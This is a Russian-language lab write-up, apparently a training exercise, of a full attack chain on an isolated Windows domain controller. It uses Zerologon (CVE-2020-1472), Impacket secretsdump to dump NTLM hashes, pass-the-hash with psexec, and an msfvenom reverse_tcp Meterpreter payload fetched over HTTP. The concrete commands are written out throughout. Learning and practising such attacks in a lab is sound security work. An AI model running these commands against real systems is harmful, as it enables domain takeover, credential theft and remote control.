
Сквозная эксплуатация контроллера домена с использованием Metasploit и Impacket: обнаружен DC10, эксплуатирован Zerologon (CVE-2020-1472), извлечены NTLM-хеши, получена оболочка SYSTEM, установлена сессия Meterpreter.
Сквозная эксплуатация контроллера домена с использованием Metasploit и Impacket: обнаружен DC10, использован Zerologon (CVE-2020-1472), извлечены NTLM-хеши, получен шелл SYSTEM, установлена сессия Meterpreter.
Краткое описание В данном упражнении продемонстрирована полная, реалистичная цепочка атак на контроллер домена, уязвимый для CVE-2020-1472 (Zerologon). Взаимодействие включало обнаружение, обогащение служб, эксплуатацию, извлечение учетных данных, горизонтальное перемещение и проверку пост-эксплуатации. Мне удалось получить доступ уровня SYSTEM и установить постоянную сессию Meterpreter на DC, используя комбинацию Zerologon, Impacket secretsdump + pass-the-hash, а также полезные нагрузки msfvenom/meterpreter. На каждом этапе были сделаны скриншоты и сохранены артефакты команд.
Обзор лаборатории: Смоделирована полная цепочка атак на контроллер домена Windows с использованием Metasploit и Impacket; обнаружение, Zerologon, secretsdump, pass-the-hash и управляемая сессия Meterpreter.
Почему это важно для организаций: Поскольку DC управляет аутентификацией, групповыми политиками и идентификацией для всего домена, его компрометация может перерасти в полное нарушение бизнес-процессов, захват учетных записей, кражу данных, развертывание программ-вымогателей и потерю регуляторного доверия. Защита DC обеспечивает непрерывность работы, доход и репутацию, предотвращая превращение идентификации в единую точку отказа.
Вам предоставлены две машины в изолированной лабораторной сети. Одна система — контроллер домена Windows (DC) с именем DC10, на которой размещены основные службы AD. Другая система — рабочая станция Kali, размещенная в том же серверном сегменте для тестирования. Предполагается, что DC открывает типичные доменные службы (например, LDAP, Kerberos, SMB) и может быть уязвим для известных проблем. Хост Kali должен использоваться для разведки, эксплуатации, получения учетных данных, горизонтального перемещения и проверки пост-эксплуатации. Задача — идентифицировать DC, подтвердить данные домена, получить первоначальную точку опоры с помощью применимой техники, извлечь материал учетных данных для получения административного доступа, а затем продемонстрировать контроль над DC через удаленный шелл и сессию управляемого агента, адаптируясь к любым ограничениям среды, таким как пропатченные службы, ограниченный исходящий трафик или защита конечных точек. DC: 10.1.16.1 Kali: 10.1.16.66
Я использовал msfconsole с поддержкой БД, выполнил nmap-сканирование из MSF, импортировал результаты и уточнил хосты и службы для подтверждения доступности DC10.
Я выполнил SYN-порт-скан в MSF, снял отпечаток SMB и подтвердил LDAP и Kerberos на 10.1.16.1. Я запросил LDAP для получения имени домена.
### Проверка версии SMB
auxiliary/scanner/smb/smb_version.
auxiliary/gather/ldap_query.
Я запустил auxiliary/admin/dcerpc/cve_2020_1472_zerologon против DC10 для сброса пароля учетной записи машины до пустого.
Используя Impacket, я сдампил NTLM-хеши с DC и определил учетные данные администратора для pass-the-hash.
impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]
Я использовал pass-the-hash с psexec для получения шелла уровня SYSTEM на DC10 и подтвердил идентичность хоста.
impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9
Как видите, я уже нахожусь в C:\Windows\system32
Я сгенерировал полезную нагрузку reverse_tcp meterpreter, разместил её по HTTP, загрузил на DC10, запустил обработчик и выполнил полезную нагрузку для открытия сессии Meterpreter.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe
Я запустил простой веб-сервер, чтобы целевая система могла легко получить этот исполняемый файл meterpreter, используя:
python3 -m http.server 8080
На целевой машине я выполнил исполняемый файл meterpreter (secret.exe)
Как видите, теперь у меня установлено обратное шелл-соединение между целевым DC10 и системами Kali. Это было достигнуто путем использования только внешних/удаленных эксплойтов против уязвимой цели.
Хотя система Kali находится в серверной подсети вместе с целевым DC10, такие типы атак возможны через Интернет, если целевая система открыта для внешней сети.